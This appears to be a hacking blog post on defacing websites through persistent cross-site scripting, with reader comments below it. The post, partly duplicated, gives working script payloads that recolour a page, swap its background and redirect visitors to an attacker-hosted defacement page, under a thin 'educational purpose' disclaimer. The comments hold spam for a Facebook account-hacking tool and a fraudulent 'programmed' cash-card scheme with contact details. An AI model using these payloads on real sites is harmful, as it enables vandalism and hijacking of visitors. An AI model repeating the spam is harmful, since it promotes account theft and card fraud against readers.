I
explained how to do vulnerability test for XSS and some filter
bypassing technique. Now let us see how a hacker deface a website with
XSS vulnerability?
Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!
Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>
Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>
When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
Never implement this technique. I am just explaining it for educational purpose only.
Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!
Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>
Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>
Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
ReplyDeleteHello there, I believe your web site could possibly be having internet browser compatibility issues. When I look at your web site in Safari, it looks fine however, when opening in Internet Explorer, it has some overlapping issues. I merely wanted to provide you with a quick heads up! Other than that, great website! Ever wanted to hack your friends or foes facebook account? Worry not, we have the simplest and easiest tool to hack any facebook profile or account for free. Just visit www.hackfbaccount.net and start hacking.
ReplyDeleteHaving read this I believed it was very informative. I appreciate you taking the time and effort to put this informative article together. I once again find myself personally spending way too much time both reading and commenting. But so what, it was still worth it! Visit www.hackfbaccount.net to download facebook profile hacker and facebook hacker. Online facebook hacker and its all free now download www.hackfbaccount.net.
It's wonderful that you are getting thoughts from this piece of writing as well as from our discussion made at this time.
ReplyDeleteAlso visit my blog :: satellite Cardsharing
If you are in need of financial Help, don't hesitate to place order for deserve Programmed card that can withdraw any amount limit you want. Deserve Card are very transparent and easy to deal with. You can Purchase Deserve card that can withdraw up to $50,000 to $100,000 limit without being detected because of the programming of the card. I'm extremely grateful to them for being honest with their words and delivering the card to me. This is the third day of receiving the card and i have withdraw $9,500 from the Deserve Programmed Card. I tried purchasing the card previously from someone else, but it never arrived until i tried skylink technology for those in need of more money, you can also contact them. you can place order for the card Via whatsapp +1(213)785-1553 or their E-mail: skylinktechnes@yahoo.com or website: https://skylinktechnes.wixsite.com/info
ReplyDeleteor telegram group: https://t.me/hacksandinvestmenttutorials